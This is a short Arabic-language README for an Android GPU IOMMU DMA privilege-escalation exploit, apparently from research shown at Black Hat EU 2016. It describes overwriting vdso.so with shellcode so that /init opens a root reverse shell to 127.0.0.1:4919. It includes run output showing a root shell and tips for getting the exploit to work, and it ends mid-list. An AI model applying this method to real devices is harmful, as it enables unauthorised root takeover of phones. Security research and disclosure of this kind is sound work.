
استغلال GPU IOMMU DMA لأجهزة Android يقوم بكتابة vdso.so بـ shellcode لرفع الامتيازات وإنشاء shell عكسي بصلاحيات الجذر على Nexus 6p.
تم اختباره على Nexus 6p (google/angler/angler:6.0.1/MMB29M/2431559:user/release-keys)
تمت مناقشتها في 2016 عبر Blackhat EU
مع عمليات كتابة iommu dma، يتم استبدال vdso.so بـ shellcode.
لذا بعد أن ينفذ /init __kernel_clock_gettime، يتم تنفيذ shellcode.
ثم تقوم عملية /init بالاتصال العكسي مع شل جذر.
Reverse shell target: 127.0.0.1:4919
shellcode patch done
hook patch done
Waiting for reverse connect shell...
TERMINAL>>>
id
uid=0(root) gid=0(root) groups=0(root) context=u:r:init:s0
احذف /data/local/tmp/x إن وجد قبل الاستغلال.
إذا كانت مدة الانتظار طويلة جدًا، حاول فتح خيارات "الوقت والتاريخ" داخل إعدادات هاتفك.
تحقق من إصدار adreno، حاليًا هو مبني لـ 4xx.
لـ 5xx وما فوق: